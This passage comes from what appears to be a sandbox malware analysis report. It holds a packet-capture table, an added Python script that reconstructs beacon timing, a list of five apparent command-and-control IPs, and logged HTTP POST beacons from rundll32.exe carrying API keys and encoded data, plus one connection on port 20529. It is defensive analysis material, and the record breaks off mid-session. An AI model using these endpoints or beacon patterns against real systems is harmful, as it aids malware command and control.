    Jul 15, 2024 12:52:54.196414948 CEST804976877.238.250.123192.168.2.5
    Jul 15, 2024 12:52:54.196513891 CEST4976880192.168.2.577.238.250.123
    Jul 15, 2024 12:52:54.197122097 CEST4976880192.168.2.577.238.250.123
    Jul 15, 2024 12:52:54.202963114 CEST804976877.238.250.123192.168.2.5
    Jul 15, 2024 12:52:55.107028008 CEST804976777.238.229.63192.168.2.5
    Jul 15, 2024 12:52:55.107279062 CEST4976780192.168.2.577.238.229.63
    Jul 15, 2024 12:52:55.107279062 CEST4976780192.168.2.577.238.229.63
    Jul 15, 2024 12:52:55.108508110 CEST4976980192.168.2.577.238.250.123
    Jul 15, 2024 12:52:55.112230062 CEST804976777.238.229.63192.168.2.5
    Jul 15, 2024 12:52:55.113595009 CEST804976977.238.250.123192.168.2.5
    Jul 15, 2024 12:52:55.113698006 CEST4976980192.168.2.577.238.250.123
    Jul 15, 2024 12:52:55.114023924 CEST4976980192.168.2.577.238.250.123
    Jul 15, 2024 12:52:55.118882895 CEST804976977.238.250.123192.168.2.5
    Jul 15, 2024 12:52:55.587429047 CEST804976877.238.250.123192.168.2.5
    Jul 15, 2024 12:52:55.597779989 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:52:55.602874994 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:52:55.602963924 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:52:55.636183977 CEST4976880192.168.2.577.238.250.123
    Jul 15, 2024 12:52:55.710138083 CEST804976977.238.250.123192.168.2.5
    Jul 15, 2024 12:52:55.721147060 CEST4976980192.168.2.577.238.250.123
    Jul 15, 2024 12:52:55.726300955 CEST804976977.238.250.123192.168.2.5
    Jul 15, 2024 12:52:55.726393938 CEST4976980192.168.2.577.238.250.123
    Jul 15, 2024 12:52:56.228835106 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:52:56.229032993 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:52:56.233906031 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:52:56.277635098 CEST4977180192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:56.282957077 CEST8049771195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:56.283056974 CEST4977180192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:56.283332109 CEST4977180192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:56.288387060 CEST8049771195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:58.025455952 CEST8049771195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:58.025548935 CEST4977180192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:58.027501106 CEST4977180192.168.2.5195.2.70.38
    Jul 15, 2024 12:52:58.028383017 CEST4977280192.168.2.591.142.74.28
    Jul 15, 2024 12:52:58.034765959 CEST8049771195.2.70.38192.168.2.5
    Jul 15, 2024 12:52:58.034806013 CEST804977291.142.74.28192.168.2.5
    Jul 15, 2024 12:52:58.034868956 CEST4977280192.168.2.591.142.74.28
    Jul 15, 2024 12:52:58.038038015 CEST4977280192.168.2.591.142.74.28
    Jul 15, 2024 12:52:58.043406963 CEST804977291.142.74.28192.168.2.5
    Jul 15, 2024 12:52:59.757898092 CEST804977291.142.74.28192.168.2.5
    Jul 15, 2024 12:52:59.758085012 CEST4977280192.168.2.591.142.74.28
    Jul 15, 2024 12:52:59.758085012 CEST4977280192.168.2.591.142.74.28
    Jul 15, 2024 12:52:59.759062052 CEST4977380192.168.2.577.238.224.56
    Jul 15, 2024 12:52:59.763139963 CEST804977291.142.74.28192.168.2.5
    Jul 15, 2024 12:52:59.764028072 CEST804977377.238.224.56192.168.2.5
    Jul 15, 2024 12:52:59.764118910 CEST4977380192.168.2.577.238.224.56
    Jul 15, 2024 12:52:59.764374018 CEST4977380192.168.2.577.238.224.56
    Jul 15, 2024 12:52:59.769190073 CEST804977377.238.224.56192.168.2.5
    Jul 15, 2024 12:53:01.388410091 CEST804977377.238.224.56192.168.2.5
    Jul 15, 2024 12:53:01.388489008 CEST4977380192.168.2.577.238.224.56
    Jul 15, 2024 12:53:01.388578892 CEST4977380192.168.2.577.238.224.56
    Jul 15, 2024 12:53:01.389729977 CEST4977480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:01.393410921 CEST804977377.238.224.56192.168.2.5
    Jul 15, 2024 12:53:01.394637108 CEST804977477.238.229.63192.168.2.5
    Jul 15, 2024 12:53:01.394718885 CEST4977480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:01.395051003 CEST4977480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:01.399852037 CEST804977477.238.229.63192.168.2.5
    Jul 15, 2024 12:53:03.016239882 CEST804977477.238.229.63192.168.2.5
    Jul 15, 2024 12:53:03.016324043 CEST4977480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:03.018424988 CEST4977480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:03.023361921 CEST804977477.238.229.63192.168.2.5
    Jul 15, 2024 12:53:03.037658930 CEST4977580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:03.042675972 CEST804977577.238.250.123192.168.2.5
    Jul 15, 2024 12:53:03.042773008 CEST4977580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:03.051862955 CEST4977580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:03.056787968 CEST804977577.238.250.123192.168.2.5
    Jul 15, 2024 12:53:03.645287991 CEST804977577.238.250.123192.168.2.5
    Jul 15, 2024 12:53:03.645562887 CEST4977580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:03.652822018 CEST804977577.238.250.123192.168.2.5
    Jul 15, 2024 12:53:03.652956009 CEST4977580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:11.241122961 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:11.246288061 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:16.218729973 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:16.218982935 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:16.224369049 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:25.594650030 CEST4976880192.168.2.577.238.250.123
    Jul 15, 2024 12:53:25.600059032 CEST804976877.238.250.123192.168.2.5
    Jul 15, 2024 12:53:25.610445023 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:25.615324974 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:25.721863031 CEST4977680192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:25.726972103 CEST8049776195.2.70.38192.168.2.5
    Jul 15, 2024 12:53:25.727237940 CEST4977680192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:25.727612972 CEST4977680192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:25.733318090 CEST8049776195.2.70.38192.168.2.5
    Jul 15, 2024 12:53:25.827997923 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:25.875847101 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:27.482306957 CEST8049776195.2.70.38192.168.2.5
    Jul 15, 2024 12:53:27.482620001 CEST4977680192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:27.483241081 CEST4977780192.168.2.591.142.74.28
    Jul 15, 2024 12:53:27.483355045 CEST4977680192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:27.489137888 CEST804977791.142.74.28192.168.2.5
    Jul 15, 2024 12:53:27.489181995 CEST8049776195.2.70.38192.168.2.5
    Jul 15, 2024 12:53:27.489221096 CEST4977780192.168.2.591.142.74.28
    Jul 15, 2024 12:53:27.489494085 CEST4977780192.168.2.591.142.74.28
    Jul 15, 2024 12:53:27.496373892 CEST804977791.142.74.28192.168.2.5
    Jul 15, 2024 12:53:29.247735023 CEST804977791.142.74.28192.168.2.5
    Jul 15, 2024 12:53:29.247937918 CEST4977780192.168.2.591.142.74.28
    Jul 15, 2024 12:53:29.247937918 CEST4977780192.168.2.591.142.74.28
    Jul 15, 2024 12:53:29.248652935 CEST4977880192.168.2.577.238.224.56
    Jul 15, 2024 12:53:29.252837896 CEST804977791.142.74.28192.168.2.5
    Jul 15, 2024 12:53:29.253489971 CEST804977877.238.224.56192.168.2.5
    Jul 15, 2024 12:53:29.253572941 CEST4977880192.168.2.577.238.224.56
    Jul 15, 2024 12:53:29.253784895 CEST4977880192.168.2.577.238.224.56
    Jul 15, 2024 12:53:29.258563995 CEST804977877.238.224.56192.168.2.5
    Jul 15, 2024 12:53:30.876661062 CEST804977877.238.224.56192.168.2.5
    Jul 15, 2024 12:53:30.876770973 CEST4977880192.168.2.577.238.224.56
    Jul 15, 2024 12:53:30.876943111 CEST4977880192.168.2.577.238.224.56
    Jul 15, 2024 12:53:30.877686024 CEST4977980192.168.2.577.238.229.63
    Jul 15, 2024 12:53:30.881804943 CEST804977877.238.224.56192.168.2.5
    Jul 15, 2024 12:53:30.882581949 CEST804977977.238.229.63192.168.2.5
    Jul 15, 2024 12:53:30.882663965 CEST4977980192.168.2.577.238.229.63
    Jul 15, 2024 12:53:30.883075953 CEST4977980192.168.2.577.238.229.63
    Jul 15, 2024 12:53:30.887943029 CEST804977977.238.229.63192.168.2.5
    Jul 15, 2024 12:53:32.519874096 CEST804977977.238.229.63192.168.2.5
    Jul 15, 2024 12:53:32.520102978 CEST4977980192.168.2.577.238.229.63
    Jul 15, 2024 12:53:32.520102978 CEST4977980192.168.2.577.238.229.63
    Jul 15, 2024 12:53:32.520925999 CEST4978080192.168.2.577.238.250.123
    Jul 15, 2024 12:53:32.525496006 CEST804977977.238.229.63192.168.2.5
    Jul 15, 2024 12:53:32.526561022 CEST804978077.238.250.123192.168.2.5
    Jul 15, 2024 12:53:32.526787996 CEST4978080192.168.2.577.238.250.123
    Jul 15, 2024 12:53:32.527395964 CEST4978080192.168.2.577.238.250.123
    Jul 15, 2024 12:53:32.532418013 CEST804978077.238.250.123192.168.2.5
    Jul 15, 2024 12:53:33.143039942 CEST804978077.238.250.123192.168.2.5
    Jul 15, 2024 12:53:33.145590067 CEST4978080192.168.2.577.238.250.123
    Jul 15, 2024 12:53:33.155174017 CEST804978077.238.250.123192.168.2.5
    Jul 15, 2024 12:53:33.155317068 CEST4978080192.168.2.577.238.250.123
    Jul 15, 2024 12:53:33.631617069 CEST4978180192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:33.639328957 CEST8049781195.2.70.38192.168.2.5
    Jul 15, 2024 12:53:33.639436960 CEST4978180192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:33.639770985 CEST4978180192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:33.647803068 CEST8049781195.2.70.38192.168.2.5
    Jul 15, 2024 12:53:35.391968012 CEST8049781195.2.70.38192.168.2.5
    Jul 15, 2024 12:53:35.392210007 CEST4978180192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:35.392280102 CEST4978180192.168.2.5195.2.70.38
    Jul 15, 2024 12:53:35.392993927 CEST4978280192.168.2.591.142.74.28
    Jul 15, 2024 12:53:35.397962093 CEST8049781195.2.70.38192.168.2.5
    Jul 15, 2024 12:53:35.398099899 CEST804978291.142.74.28192.168.2.5
    Jul 15, 2024 12:53:35.398288965 CEST4978280192.168.2.591.142.74.28
    Jul 15, 2024 12:53:35.398521900 CEST4978280192.168.2.591.142.74.28
    Jul 15, 2024 12:53:35.405550003 CEST804978291.142.74.28192.168.2.5
    Jul 15, 2024 12:53:36.437556028 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:36.437863111 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:36.442913055 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:37.133322001 CEST804978291.142.74.28192.168.2.5
    Jul 15, 2024 12:53:37.133461952 CEST4978280192.168.2.591.142.74.28
    Jul 15, 2024 12:53:37.133624077 CEST4978280192.168.2.591.142.74.28
    Jul 15, 2024 12:53:37.134366989 CEST4978380192.168.2.577.238.224.56
    Jul 15, 2024 12:53:37.138605118 CEST804978291.142.74.28192.168.2.5
    Jul 15, 2024 12:53:37.139391899 CEST804978377.238.224.56192.168.2.5
    Jul 15, 2024 12:53:37.139475107 CEST4978380192.168.2.577.238.224.56
    Jul 15, 2024 12:53:37.139714003 CEST4978380192.168.2.577.238.224.56
    Jul 15, 2024 12:53:37.144587994 CEST804978377.238.224.56192.168.2.5
    Jul 15, 2024 12:53:38.744818926 CEST804978377.238.224.56192.168.2.5
    Jul 15, 2024 12:53:38.745250940 CEST4978380192.168.2.577.238.224.56
    Jul 15, 2024 12:53:38.745250940 CEST4978380192.168.2.577.238.224.56
    Jul 15, 2024 12:53:38.746136904 CEST4978480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:38.751420975 CEST804978377.238.224.56192.168.2.5
    Jul 15, 2024 12:53:38.751667976 CEST804978477.238.229.63192.168.2.5
    Jul 15, 2024 12:53:38.751755953 CEST4978480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:38.752332926 CEST4978480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:38.757249117 CEST804978477.238.229.63192.168.2.5
    Jul 15, 2024 12:53:40.373198986 CEST804978477.238.229.63192.168.2.5
    Jul 15, 2024 12:53:40.373343945 CEST4978480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:40.375466108 CEST4978480192.168.2.577.238.229.63
    Jul 15, 2024 12:53:40.376379967 CEST4978580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:40.380281925 CEST804978477.238.229.63192.168.2.5
    Jul 15, 2024 12:53:40.381258011 CEST804978577.238.250.123192.168.2.5
    Jul 15, 2024 12:53:40.381342888 CEST4978580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:40.381884098 CEST4978580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:40.386797905 CEST804978577.238.250.123192.168.2.5
    Jul 15, 2024 12:53:41.195003033 CEST804978577.238.250.123192.168.2.5
    Jul 15, 2024 12:53:41.195245028 CEST4978580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:41.200865984 CEST804978577.238.250.123192.168.2.5
    Jul 15, 2024 12:53:41.200973034 CEST4978580192.168.2.577.238.250.123
    Jul 15, 2024 12:53:51.447284937 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:51.454394102 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:55.603470087 CEST4976880192.168.2.577.238.250.123
    Jul 15, 2024 12:53:55.608520985 CEST804976877.238.250.123192.168.2.5
    Jul 15, 2024 12:53:55.822423935 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:55.827843904 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:56.041301012 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:56.089605093 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:56.655725956 CEST2052949770185.231.155.234192.168.2.5
    Jul 15, 2024 12:53:56.656270981 CEST4977020529192.168.2.5185.231.155.234
    Jul 15, 2024 12:53:56.661226988 CEST2052949770185.231.155.234192.168.2.5
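When this TCP packet table is copied out of the report, its five columns (timestamp, source port, destination port, source IP, destination IP) are run together into one token, for example `Jul 15, 2024 12:51:41.317159891 CEST4973880192.168.2.5195.2.70.38`. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code: it recovers the fields from that raw form using two constraints the capture supports (192.168.2.5 is the analysis VM, and its client ports are 5-digit ephemeral ports), treats the first outbound packet on a client port not seen before as the start of a connection, and then summarises per remote endpoint how many connections were opened, the gaps between them, and whether the port is one a web beacon would normally use. The eleven sample rows embedded in the script are copied verbatim from the table; the ephemeral-port floor (49152) and the set of "common" ports are assumptions of the example, not values from the report.

```python
import re
from collections import defaultdict
from datetime import datetime

# The analysis VM's address: the one constant in every row of the report's TCP table.
SANDBOX_IP = "192.168.2.5"
# Assumption of this example: the sandbox's client ports sit in the IANA dynamic range
# (every one observed is 497xx), which is what disambiguates the digit runs below.
EPHEMERAL_MIN = 49152
# Assumption of this example: ports a web-style beacon would normally use; others get flagged.
COMMON_PORTS = {80, 443}

# Raw row: "<Mon d, yyyy hh:mm:ss.nnnnnnnnn> CEST<src port><dst port><src ip><dst ip>"
_ROW = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})(?P<frac>\.\d+) CEST(?P<rest>[\d.]+)$"
)

# Constructed sample: eleven rows copied verbatim from the table in this report. Two
# rundll32.exe processes beacon to the same hosts, so per-host gaps are not one fixed interval.
SAMPLE_ROWS = [
    "Jul 15, 2024 12:51:41.317159891 CEST4973880192.168.2.5195.2.70.38",
    "Jul 15, 2024 12:51:41.322197914 CEST8049738195.2.70.38192.168.2.5",
    "Jul 15, 2024 12:51:41.322319984 CEST4973880192.168.2.5195.2.70.38",
    "Jul 15, 2024 12:51:43.054729939 CEST4973980192.168.2.591.142.74.28",
    "Jul 15, 2024 12:51:44.790029049 CEST4974080192.168.2.577.238.224.56",
    "Jul 15, 2024 12:51:46.385272980 CEST4974280192.168.2.577.238.229.63",
    "Jul 15, 2024 12:51:47.998259068 CEST4974380192.168.2.577.238.250.123",
    "Jul 15, 2024 12:52:09.875325918 CEST4974580192.168.2.5195.2.70.38",
    "Jul 15, 2024 12:52:47.422568083 CEST4976080192.168.2.5195.2.70.38",
    "Jul 15, 2024 12:52:55.597779989 CEST4977020529192.168.2.5185.231.155.234",
    "Jul 15, 2024 12:52:55.602874994 CEST2052949770185.231.155.234192.168.2.5",
]


def _valid_port(s, ephemeral=False):
    if not s.isdigit() or s.startswith("0"):
        return False
    return (EPHEMERAL_MIN if ephemeral else 1) <= int(s) <= 65535


def _valid_ip(s):
    octets = s.split(".")
    return len(octets) == 4 and all(
        o.isdigit() and (o == "0" or o[0] != "0") and int(o) <= 255 for o in octets)


def parse_row(line, sandbox_ip=SANDBOX_IP):
    """Recover ts/src/dst from a row whose separators were lost. Every split that satisfies
    the port and IP constraints is collected; exactly one must survive or the row is rejected."""
    m = _ROW.match(line.strip())
    if not m:
        raise ValueError("not a packet row: %r" % line)
    base = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
    # Seconds since a naive epoch; the report's times are CEST and only differences matter here.
    ts = (base - datetime(1970, 1, 1)).total_seconds() + float("0" + m["frac"])
    rest, found = m["rest"], []
    pos = rest.find(sandbox_ip)
    while pos != -1:
        head, tail = rest[:pos], rest[pos + len(sandbox_ip):]
        if tail == "" and "." in head:
            # inbound: <remote port><local port><remote ip><sandbox ip>
            digits, suffix = head.split(".", 1)
            for n in range(1, 6):
                rport, lport, octet = digits[:n], digits[n:n + 5], digits[n + 5:]
                ip = octet + "." + suffix
                if _valid_port(rport) and len(lport) == 5 and _valid_port(lport, True) and _valid_ip(ip):
                    found.append((ip, int(rport), sandbox_ip, int(lport)))
        elif tail and head.isdigit() and _valid_ip(tail):
            # outbound: <local port><remote port><sandbox ip><remote ip>
            lport, rport = head[:5], head[5:]
            if _valid_port(lport, True) and _valid_port(rport):
                found.append((sandbox_ip, int(lport), tail, int(rport)))
        pos = rest.find(sandbox_ip, pos + 1)
    if len(found) != 1:
        raise ValueError("ambiguous or unparsable row %r: %r" % (line, found))
    src_ip, src_port, dst_ip, dst_port = found[0]
    return {"ts": ts, "src_ip": src_ip, "src_port": src_port, "dst_ip": dst_ip, "dst_port": dst_port}


def connections(rows, sandbox_ip=SANDBOX_IP):
    """The first outbound packet on a client port not seen before is the SYN that opens a flow."""
    seen, flows = set(), []
    for r in rows:
        if r["src_ip"] == sandbox_ip and r["src_port"] not in seen:
            seen.add(r["src_port"])
            flows.append((r["ts"], r["dst_ip"], r["dst_port"], r["src_port"]))
    return flows


def beacon_summary(flows):
    """Per remote endpoint: number of flows, gaps between them (s), and whether the port is unusual."""
    by_dst = defaultdict(list)
    for ts, ip, port, _ in flows:
        by_dst[(ip, port)].append(ts)
    return {
        key: {"count": len(times),
              "gaps": [round(b - a, 3) for a, b in zip(times, times[1:])],
              "nonstandard_port": key[1] not in COMMON_PORTS}
        for key, times in by_dst.items()
    }


if __name__ == "__main__":
    summary = beacon_summary(connections([parse_row(r) for r in SAMPLE_ROWS]))
    for (ip, port), info in sorted(summary.items()):
        flag = "  <-- non-standard port" if info["nonstandard_port"] else ""
        print("%s:%d flows=%d gaps=%s%s" % (ip, port, info["count"], info["gaps"], flag))
```

Run stand-alone it prints one line per endpoint. On the full table the same logic shows the port-80 hosts being contacted in a fixed rotation (195.2.70.38, 91.142.74.28, 77.238.224.56, 77.238.229.63, 77.238.250.123) by what appear to be both rundll32.exe processes, which is why the gaps to any single host are not one constant interval, and it isolates the single long-lived 20529/tcp connection to 185.231.155.234 as the endpoint worth flagging separately from the HTTP traffic.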
    • 195.2.70.38
    • 91.142.74.28
    • 77.238.224.56
    • 77.238.229.63
    • 77.238.250.123
    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    0 | 192.168.2.5 | 49707 | 195.2.70.38 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:50:54.649132967 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 7MBMBL3a
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    1 | 192.168.2.5 | 49708 | 195.2.70.38 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:50:55.833787918 CEST | 293 | OUT | POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: eSQmUE8j
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    2 | 192.168.2.5 | 49709 | 91.142.74.28 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:50:56.412877083 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 1mEhlOkp
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    3 | 192.168.2.5 | 49710 | 91.142.74.28 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:50:57.545780897 CEST | 294 | OUT | POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: MyXTF7ll
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    4 | 192.168.2.5 | 49711 | 77.238.224.56 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:50:58.163238049 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: CGtGxHJD
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    5 | 192.168.2.5 | 49712 | 77.238.224.56 | 80 | 1216 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    Jul 15, 2024 12:50:59.386687040 CEST | 295 | OUT | POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: NcwlBYDJ
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    6 | 192.168.2.5 | 49713 | 77.238.229.63 | 80 | 6580 | C:\Windows\SysWOW64\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
